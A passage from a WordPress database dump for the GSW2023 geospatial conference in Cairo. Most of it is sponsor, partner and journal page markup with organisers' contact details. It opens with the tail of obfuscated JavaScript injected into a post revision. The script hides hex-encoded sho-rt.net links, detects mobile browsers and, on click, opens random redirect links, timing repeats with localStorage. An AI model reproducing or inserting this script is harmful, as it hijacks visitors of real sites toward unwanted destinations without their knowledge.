_0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-08-15 23:02:23','2023-08-15 23:02:23','',3066,'https://gsw2023.com/?p=5212',0,'revision','',0),
(5213,1,'2023-08-15 23:13:27','2023-08-15 23:13:27','<p>[vc_row css=\".vc_custom_1692141097010{margin-top: -150px !important;}\"][vc_column][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #0000ff;\"><strong>Under the Auspices of </strong></span><br />\n<span style=\"font-size: 24pt; color: #0000ff;\"><strong>H.E. Professor Mostafa Madbouly,</strong></span><br />\n<span style=\"font-size: 24pt; color: #0000ff;\"><strong>Prime Minister of the Arab Republic of Egypt</strong></span></h3>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_separator style=\"shadow\" border_width=\"10\"][vc_row][vc_column][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><strong><span style=\"font-size: 24pt;\">Prime Sponsors</span></strong></h4>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1687219449581{margin-top: 115px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1689081933017{margin-top: 145px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.tra.gov.eg/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5009 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/ntra-300x116.jpg\" alt=\"\" width=\"300\" height=\"116\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1689081968974{margin-top: 160px !important;}\"]<a href=\"https://www.mbrsc.ae/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5093 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/MBRSC-LOGO_1-01-300x149.png\" alt=\"\" width=\"300\" height=\"149\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1689081968955{margin-top: 115px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.esri.com/en-us/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4719\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/ESRI-300x111.jpg\" alt=\"\" width=\"487\" height=\"180\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1689081337215{margin-top: 40px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffffff;\"><strong>Platinum Sponsors</strong></span></h4>\n<h4 style=\"text-align: center;\"></h4>\n<p><a href=\"https://www.pix4d.com/ \" target=\"_blank\" rel=\"noopener\"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1689080719428{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>                    Platinum Sponsors</strong></span></h4>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1689081395417{margin-top: 10px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffffff;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://abuqir.net/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5005\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/aboquir-239x300.png\" alt=\"\" width=\"193\" height=\"242\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096091997{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096010128{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"https://hdmap.geomatics.ncku.edu.tw/index-US.php\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095942758{margin-top: 137px !important;}\"]<a href=\"https://www.applanix.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219836213{margin-top: -px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951584642{margin-top: 45px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][vc_column_text css=\".vc_custom_1688951717998{margin-top: 90px !important;}\"]<a href=\"https://www.agisoft.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4987 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image-300x102.png\" alt=\"\" width=\"300\" height=\"102\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095881067{margin-top: 20px !important;}\"]<a href=\"https://www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690459872519{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://www.piesat.cn/en-us/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5053\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/5X5cm-PIESAT-Logo-300x300.png\" alt=\"\" width=\"276\" height=\"276\" /></a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690460056235{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://www.vexcel-imaging.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4990 \" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image002.jpg\" alt=\"\" width=\"179\" height=\"213\" /></a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951105389{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" /><br />\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096291206{margin-top: 50px !important;}\"]<a href=\"https://www.geosat.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096367037{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"https://www.riegl.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096532104{margin-top: 88px !important;}\"]<a href=\"https://www.robotlab.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690251276274{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-e1690251327743-300x167.png\" alt=\"\" width=\"309\" height=\"172\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690452445334{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Tourism partner</span></h4>\n<h4 style=\"text-align: center;\"><a href=\"https://funtrip-travel.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5041\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/LOGO-FINAL2-300x184.jpg\" alt=\"\" width=\"265\" height=\"163\" /></a></h4>\n<p style=\"text-align: center;\">Email : <span style=\"color: #3366ff;\"><strong>gsw2023@funtrip-travel.com</strong></span></p>\n<p style=\"text-align: center;\">Mobile no and WhatsApp: <span style=\"color: #3366ff;\"><strong>+201221541515</strong></span></p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Ffuntrip-travel.com%2F|title:FunTrip|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690452582489{margin-top: -15px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For FunTrip More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690600884765{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Exhibition organizer</span></h4>\n<h4 style=\"text-align: center;\"><a href=\"https://www.purespot.org/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5061\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/Logo-Pure-2-300x300.jpg\" alt=\"\" width=\"151\" height=\"151\" /></a></h4>\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt; color: #3366ff;\"><strong>project manager </strong></span><br />\n<span style=\"font-size: 8pt;\"><strong>Mr. Omar Mohamed</strong></span><br />\n<span style=\"font-size: 8pt;\">Email: omar.mohamed@egypure.org   </span><span style=\"font-size: 8pt;\"> phone : ⁦+20 100 098 8976⁩</span></p>\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt;\"><strong>Mr. Ahmed Refaat</strong></span><br />\n<span style=\"font-size: 8pt;\">Email: ahmed.refaat@egypure.org   </span><span style=\"font-size: 8pt;\">  phone :⁦+20 100 084 4792</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1691508515384{margin-top: 50px !important;}\"]</p>\n<h1 style=\"text-align: center;\">Journals partner</h1>\n<h3 style=\"text-align: center;\">The author has the opportunity to publish his/her articles in one of the following journals :</h3>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><span style=\"color: #000000;\"><a style=\"color: #000000;\" href=\"https://www.springer.com/journal/43995/\"><span style=\"font-size: 14pt;\"><strong>Journal of Umm Al-Qura University for Engineering and Architecture</strong></span></a></span></p>\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><strong><a href=\"http://www.springer.com/journal/43995\">www.springer.com/journal/43995</a></strong></span></p>\n<h3></h3>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt; color: #000000;\"><strong>Journal of Engineering and Thermal Sciences (JETS) ISSN (Online) 2669-2465</strong></span></p>\n<p style=\"text-align: center;\"><strong><span style=\"font-size: 14pt;\"><a href=\"http://www.extrica.com/journal/jets\">www.extrica.com/journal/jets</a></span></strong></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1687848604610{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 10px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: center;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row content_placement=\"top\" css=\".vc_custom_1687710509489{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/3\" css=\".vc_custom_1687711699560{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687711558584{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity. <a href=\"https://gsw2023.com/index.php/welcome/\"><span style=\"text-decoration: underline;\"><strong><span style=\"color: #3366ff; text-decoration: underline;\">Read 